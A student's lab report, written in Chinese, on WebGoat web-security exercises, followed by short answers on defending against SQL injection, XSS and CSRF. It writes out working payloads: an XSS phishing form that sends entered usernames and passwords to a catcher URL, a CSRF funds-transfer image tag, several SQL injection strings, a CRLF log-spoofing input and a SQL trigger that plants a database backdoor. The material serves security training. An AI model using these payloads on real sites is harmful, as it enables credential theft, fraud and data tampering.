20145206邹京儒 web安全基础实践

一、实践过程记录

关于WebGoat

1、我们在命令行里执行:java -jar webgoat-container-7.0.1-war-exec.jar运行WebGoat:



2、在浏览器上访问localhost:8080/WebGoat,进入WebGoat

Cross-Site Scripting(XSS)练习

Phishing with XSS

1、这个题目我们要在搜索框中输入XSS攻击代码,让受害人在我们创建的form中填写用户名和密码,完整的XSS攻击代码如下:

</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

输入攻击代码后点击搜索:



登录之后,成功获取!



Stored XSS Attacks

1、在title中随意输入一些东西,然后在message中输入一段代码,比如:<script>alert("20145206 succeed!");</script>

2、提交后,出现如下链接,点击:

3、成功!

Reflected XSS Attacks

1、题目如下:



2、我们将带有攻击性的URL作为输入源,例如输入

Cross Site Request Forgery(CSRF)

1、目的是要写一个URL诱使其他用户点击,从而触发CSRF攻击

2、输入这样一串代码:<img src="http://localhost:8080/WebGoat/attack?Screen=277&menu=900&transferFunds=4000"/>



其中,参数需要自己输入。

3、成功!

CSRF Prompt By-Pass

1、这次包括了两个请求,一是转账请求,二是确认转账成功请求

2、在浏览器中手动输入URL:localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=5000进入确认转账请求页面:

3、点击了CONFIRM按钮之后,再在浏览器中输入URL:localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=CONFIRM,成功!

Injection Flaws练习

Numeric SQL Injection

1、题目如下:



题目大意是这个表单允许使用者看到天气数据,利用SQL注入使得可以看见所有数据!

2、启动BurpSuite,进行相关配置如下:





设置好之后回到题目,任意选择一项,点击GO,然后回到burpsuite。发现多了捕获的包:

右键send to repeater ,我们修改station值从为101 101 or 1=1,点击GO



回到Proxy中点击Intercept is on对剩下的包不作处理,回到火狐发现已经成功

Log Spoofing

1、在User Name文本框中输入20145206%0d%0aLogin Succeeded for username: admin

2、如图所示,攻击成功:

String SQL Injection

1、题目大意是:这个表单允许使用者查询他们的信用卡号,使用SQL注入让所有的信用卡号都看得见。

首先试试Smith

2、这里构造语句'or 1='1,成功得到了全部的信用卡号,这样构造的理由是第一个分号用来闭合last_name的第一个分号,而第二个分号用来闭合last_name的第二个分号。这样一条语句被强行拆分成为两条语句!

LAB:SQL Injection(Stage 1:String SQL Injection)

1、以用户Neville登录,但SQL注入后并不成功,查看网页源代码,发现原来有长度限制,修改长度如下:

2、成功登录!

LAB:SQL Injection(Stage 3:Numeric SQL Injection)

1、以用户名Larry登录,登录之后看到浏览员工信息的按钮是ViewProfile:

2、在网页代码中分析一下这个按钮,发现这个地方是以员工ID作为索引传递参数的,我们要达到通过Larry来浏览老板账户信息的目的,一般来说老板的工资都应该是最高的,所以把其中的value值改为101 or 1=1 order by salary desc --,这样老板的信息就会被排到第一个:



3、成功!

Database Backdoors

1、先输一个101,得到了该用户的信息:

2、输入注入语句:101; update employee set salary=10000成功把该用户的工资涨到了10000:

3、接下来使用语句101;CREATE TRIGGER 5206BackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20145206@163.com' WHERE userid = NEW.userid创建一个后门,把表中所有的邮箱和用户ID都设为我的:

Blind Numeric SQL Injection

1、首先尝试默认的101,发现显示Account number is valid,说明这个是真!



2、看了zqh同学的博客,知道了确定了上下界之后每次使用二分法就可以得到结果了!

最终结果:





一共完成12道题目。

二、实验后回答问题

(1)SQL注入攻击原理,如何防御

原理:

SQL注入攻击的基本原理,是从客户端合法接口提交特殊的非法代码,让其注入到服务器端执行业务的SQL中去,进而改变SQL语句的原有逻辑和影响服务器端正常业务的处理。

防御:

执行验证的SQL语句;

使用正则表达式屏蔽特殊字符;

使用PreparedStatement代替Statement;

(2)XSS攻击的原理,如何防御

原理:

XSS攻击的主要目的则是,想办法获取目标攻击网站的cookie,因为有了cookie相当于有了seesion,有了这些信息就可以在任意能接进互联网的pc登陆该网站,并以其他人的生份登陆,做一些破坏。

防御:

当恶意代码值被作为某一标签的内容显示:在不需要html输入的地方对html 标签及一些特殊字符( ” < > & 等等 )做过滤,将其转化为不被浏览器解释执行的字符。

当恶意代码被作为某一标签的属性显示,通过用 “将属性截断来开辟新的属性或恶意方法:属性本身存在的 单引号和双引号都需要进行转码;对用户输入的html 标签及标签属性做白名单过滤,也可以对一些存在漏洞的标签和属性进行专门过滤。

(3)CSRF攻击原理,如何防御

原理:

CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统,类似于钓鱼。

防御:

通过 referer、token 或者 验证码 来检测用户提交。

尽量不要在页面的链接中暴露用户隐私信息。

对于用户修改删除等操作最好都使用post 操作 。

避免全站通用的cookie,严格设置cookie的域。

三、实验总结与体会

这次的实验主要是练习题目,虽然有的题目不是能够完全看懂,但通过参考其他同学的博客也顺利完成了,我觉得重要的是了解每个实验的原理吧,就比如说SQL注入,其实输入的字符串每次利用的原理都一样的,知道原理就好办多了。这次的实验多在实践,“实践是检验真理的唯一标准”没错的,通过实战对这部分知识掌握的更透彻了。

20145206邹京儒 web安全基础实践的更多相关文章

  1. 20145206邹京儒 Exp8 Web基础

    20145206邹京儒 Exp8 Web基础 一.实践过程记录 Apache (一)环境配置 1.查看端口占用:在这里apach2占用端口80 2.测试apache是否正常工作:在kali的火狐浏览器 ...

  2. 20145206邹京儒《网络对抗》逆向及Bof基础实践

    20145206邹京儒<网络对抗>逆向及Bof基础实践 1 逆向及Bof基础实践说明 1.1 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:ma ...

  3. 20145206邹京儒MSF基础应用

    20145206邹京儒MSF基础应用 一.MS08_067漏洞渗透攻击实践 实验前准备 1.两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版). 2.在VMware中设置两台 ...

  4. 20145206邹京儒《Java程序设计》课程总结

    20145206邹京儒<Java程序设计>课程总结 (按顺序)每周读书笔记链接汇总 第一周:http://www.cnblogs.com/ZouJR/p/5213572.html http ...

  5. 20145206邹京儒 EXP7网络欺诈技术防范

    20145206邹京儒 EXP7网络欺诈技术防范 一.实践过程记录 URL攻击实验前准备 1.在终端中输入命令:netstat -tupln |grep 80,查看80端口是否被占用,如下图所示 2. ...

  6. 20145206邹京儒Exp6 信息搜集与漏洞扫描

    20145206邹京儒Exp6 信息搜集与漏洞扫描 一.实践过程记录 openvas漏洞扫描 1.openvas-check-setup来查看下他的安装状态: 如下图所示:在步骤7中出现错误,显示需要 ...

  7. 20145206邹京儒《网络对抗技术》 PC平台逆向破解

    20145206邹京儒<网络对抗技术> PC平台逆向破解 注入shellcode并执行 一.准备一段shellcode 二.设置环境 具体在终端中输入如下: apt-cache searc ...

  8. 20145206邹京儒《Java程序设计》第8周学习总结

    20145206 <Java程序设计>第8周学习总结 教材学习内容总结 第十四章 NIO与NIO2 14.1 认识NIO NIO使用频道(Channel)来衔接数据节点,在处理数据时,NI ...

  9. 20145206邹京儒《Java程序设计》第3周学习总结

    20145206 <Java程序设计>第3周学习总结 教材学习内容总结 第四章 4.1 定义类 class Clothes{ String color; char size; } publ ...

随机推荐

  1. Codeforces 838B - Diverging Directions - [DFS序+线段树]

    题目链接:http://codeforces.com/problemset/problem/838/B You are given a directed weighted graph with n n ...

  2. 【紫书】Undraw the Trees UVA - 10562 递归,字符串

    题意:给你画了一颗树,你要把它的前序输出. 题解:读进到二维数组.边解析边输出. 坑:少打了个-1. #define _CRT_SECURE_NO_WARNINGS #include<cstri ...

  3. CCCC训练赛一些模板 struct sstream

    重载与构造 struct node { friend bool operator< (node n1, node n2) { return n1.priority > n2.priorit ...

  4. hadoop(角色)各个组件配置信息

    1)namenode:        core-site.xml文件中决定:            <property>                <name>fs.def ...

  5. 洛谷P4035 球形空间产生器 [JSOI2008] 高斯消元

    正解:高斯消元 解题报告: 链接! 昂开始看到以为是,高斯消元板子题? 开始很容易想到的是,虽然是多维但是可以类比二维三维列出式子嘛 但是高斯消元是只能处理一元问题的啊,,,辣怎么处理呢 对的这就是这 ...

  6. startuml 2.6注册

    参考:http://bbs.chinapyg.com/thread-79022-1-1.html 各平台版本均适用,本文更改的为Mac版本.​ 1,打开对应 mac版本的安装包位置,在对应目录/App ...

  7. Spark中的Spark Shuffle详解

    Shuffle简介 Shuffle描述着数据从map task输出到reduce task输入的这段过程.shuffle是连接Map和Reduce之间的桥梁,Map的输出要用到Reduce中必须经过s ...

  8. Py-apply用法学习【转载】

    转自:https://blog.csdn.net/anshuai_aw1/article/details/82347016 1.Apply Python中apply函数的格式为:apply(func, ...

  9. [LeetCode] 42. Trapping Rain Water_hard tag: Two Pointers

    Given n non-negative integers representing an elevation map where the width of each bar is 1, comput ...

  10. Java-使用IO流对大文件进行分割和分割后的合并

    有的时候我们想要操作的文件很大,比如:我们想要上传一个大文件,但是收到上传文件大小的限制,无法上传,这是我们可以将一个大的文件分割成若干个小文件进行操作,然后再把小文件还原成源文件.分割后的每个小文件 ...